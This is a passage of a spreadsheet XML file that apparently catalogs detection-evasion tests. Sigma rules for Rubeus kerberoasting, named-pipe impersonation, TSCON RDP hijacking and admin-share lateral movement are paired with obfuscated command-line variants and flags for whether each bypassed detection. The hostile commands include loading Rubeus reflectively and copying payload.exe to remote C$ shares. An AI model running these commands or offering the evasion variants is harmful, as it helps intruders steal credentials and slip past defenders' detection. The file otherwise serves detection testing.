    <row r="2224" ht="15.75" customHeight="1" s="42"/>
    <row r="2225" ht="15.75" customHeight="1" s="42"/>
    <row r="2226" ht="15.75" customHeight="1" s="42"/>
    <row r="2227" ht="15.75" customHeight="1" s="42"/>
    <row r="2228" ht="15.75" customHeight="1" s="42"/>
    <row r="2229" ht="15.75" customHeight="1" s="42"/>
    <row r="2230" ht="15.75" customHeight="1" s="42"/>
    <row r="2231" ht="15.75" customHeight="1" s="42"/>
    <row r="2232" ht="15.75" customHeight="1" s="42"/>
    <row r="2233" ht="15.75" customHeight="1" s="42"/>
    <row r="2234" ht="15.75" customHeight="1" s="42"/>
    <row r="2235" ht="15.75" customHeight="1" s="42"/>
    <row r="2236" ht="15.75" customHeight="1" s="42"/>
    <row r="2237" ht="15.75" customHeight="1" s="42"/>
    <row r="2238" ht="15.75" customHeight="1" s="42"/>
    <row r="2239" ht="15.75" customHeight="1" s="42"/>
    <row r="2240" ht="15.75" customHeight="1" s="42"/>
    <row r="2241" ht="15.75" customHeight="1" s="42"/>
    <row r="2242" ht="15.75" customHeight="1" s="42"/>
    <row r="2243" ht="15.75" customHeight="1" s="42"/>
    <row r="2244" ht="15.75" customHeight="1" s="42"/>
    <row r="2245" ht="15.75" customHeight="1" s="42"/>
    <row r="2246" ht="15.75" customHeight="1" s="42"/>
    <row r="2247" ht="15.75" customHeight="1" s="42"/>
    <row r="2248" ht="15.75" customHeight="1" s="42"/>
    <row r="2249" ht="15.75" customHeight="1" s="42"/>
    <row r="2250" ht="15.75" customHeight="1" s="42"/>
    <row r="2251" ht="15.75" customHeight="1" s="42"/>
    <row r="2252" ht="15.75" customHeight="1" s="42"/>
    <row r="2253" ht="15.75" customHeight="1" s="42"/>
    <row r="2254" ht="15.75" customHeight="1" s="42"/>
    <row r="2255" ht="15.75" customHeight="1" s="42"/>
    <row r="2256" ht="15.75" customHeight="1" s="42"/>
    <row r="2257" ht="15.75" customHeight="1" s="42"/>
    <row r="2258" ht="15.75" customHeight="1" s="42"/>
    <row r="2259" ht="15.75" customHeight="1" s="42"/>
    <row r="2260" ht="15.75" customHeight="1" s="42"/>
    <row r="2261" ht="15.75" customHeight="1" s="42"/>
    <row r="2262" ht="15.75" customHeight="1" s="42"/>
    <row r="2263" ht="15.75" customHeight="1" s="42"/>
    <row r="2264" ht="15.75" customHeight="1" s="42"/>
    <row r="2265" ht="15.75" customHeight="1" s="42"/>
    <row r="2266" ht="15.75" customHeight="1" s="42"/>
    <row r="2267" ht="15.75" customHeight="1" s="42"/>
    <row r="2268" ht="15.75" customHeight="1" s="42"/>
    <row r="2269" ht="15.75" customHeight="1" s="42"/>
    <row r="2270" ht="15.75" customHeight="1" s="42"/>
    <row r="2271" ht="15.75" customHeight="1" s="42"/>
    <row r="2272" ht="15.75" customHeight="1" s="42"/>
    <row r="2273" ht="15.75" customHeight="1" s="42"/>
    <row r="2274" ht="15.75" customHeight="1" s="42"/>
    <row r="2275" ht="15.75" customHeight="1" s="42"/>
    <row r="2276" ht="15.75" customHeight="1" s="42"/>
    <row r="2277" ht="15.75" customHeight="1" s="42"/>
    <row r="2278" ht="15.75" customHeight="1" s="42"/>
    <row r="2279" ht="15.75" customHeight="1" s="42"/>
    <row r="2280" ht="15.75" customHeight="1" s="42"/>
    <row r="2281" ht="15.75" customHeight="1" s="42"/>
    <row r="2282" ht="15.75" customHeight="1" s="42"/>
    <row r="2283" ht="15.75" customHeight="1" s="42"/>
    <row r="2284" ht="15.75" customHeight="1" s="42"/>
    <row r="2285" ht="15.75" customHeight="1" s="42"/>
    <row r="2286" ht="15.75" customHeight="1" s="42"/>
    <row r="2287" ht="15.75" customHeight="1" s="42"/>
    <row r="2288" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K2001"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34" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="35" t="inlineStr">
        <is>
          <t>Technical</t>
        </is>
      </c>
      <c r="B1" s="35" t="inlineStr">
        <is>
          <t>Rule_name</t>
        </is>
      </c>
      <c r="C1" s="35" t="inlineStr">
        <is>
          <t>Title</t>
        </is>
      </c>
      <c r="D1" s="35" t="inlineStr">
        <is>
          <t>Rule_id</t>
        </is>
      </c>
      <c r="E1" s="35" t="inlineStr">
        <is>
          <t>Commandline_evasion</t>
        </is>
      </c>
      <c r="F1" s="35" t="inlineStr">
        <is>
          <t>Excutable</t>
        </is>
      </c>
      <c r="G1" s="35" t="inlineStr">
        <is>
          <t>Bypass target rule</t>
        </is>
      </c>
      <c r="H1" s="35" t="inlineStr">
        <is>
          <t>Bypass all rule</t>
        </is>
      </c>
      <c r="I1" s="35" t="inlineStr">
        <is>
          <t>Trigger rule</t>
        </is>
      </c>
      <c r="J1" s="35" t="inlineStr">
        <is>
          <t>LLM</t>
        </is>
      </c>
      <c r="K1" s="35" t="inlineStr">
        <is>
          <t>behavior</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B2" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C2" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D2" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E2" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B3" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C3" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D3" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E3" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B4" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C4" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D4" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E4" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B5" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C5" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D5" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E5" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B6" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C6" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D6" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E6" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -encoDINg Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B7" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C7" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D7" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E7" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B8" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C8" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D8" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E8" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Content -Path '\\.\pipe\target_pipe' -Value 'data'"</t>
        </is>
      </c>
      <c r="F8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B9" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_tscon_rdp_redirect</t>
        </is>
      </c>
      <c r="C9" s="36" t="inlineStr">
        <is>
          <t>Suspicious RDP Redirect Using TSCON</t>
        </is>
      </c>
      <c r="D9" s="36" t="inlineStr">
        <is>
          <t>f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb</t>
        </is>
      </c>
      <c r="E9" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "tscon 1337 /de^st:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K9" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="43" t="n"/>
      <c r="B10" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C10" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D10" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E10" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="36" t="n"/>
      <c r="J10" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="43" t="n"/>
      <c r="B11" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C11" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D11" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E11" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="43" t="n"/>
      <c r="B12" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C12" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D12" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E12" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="36" t="n"/>
      <c r="J12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="43" t="n"/>
      <c r="B13" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C13" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D13" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E13" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="36" t="n"/>
      <c r="J13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="43" t="n"/>
      <c r="B14" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C14" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D14" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E14" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="36" t="n"/>
      <c r="J14" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="43" t="n"/>
      <c r="B15" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C15" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D15" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E15" s="36" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="36" t="n"/>
      <c r="J15" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="43" t="n"/>
      <c r="B16" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C16" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D16" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E16" s="36" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C17" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D17" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E17" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F17" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B18" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C18" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D18" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E18" s="43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F18" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B19" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C19" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D19" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E19" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="36" t="n"/>
      <c r="J19" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B20" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C20" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D20" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E20" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="36" t="n"/>
      <c r="J20" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B21" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C21" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D21" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E21" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="36" t="n"/>
      <c r="J21" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B22" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C22" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D22" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E22" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B23" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C23" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D23" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E23" s="36" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B24" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C24" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D24" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E24" s="36" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="36" t="n"/>
      <c r="J24" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B25" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C25" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D25" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E25" s="43" t="inlineStr">
        <is>
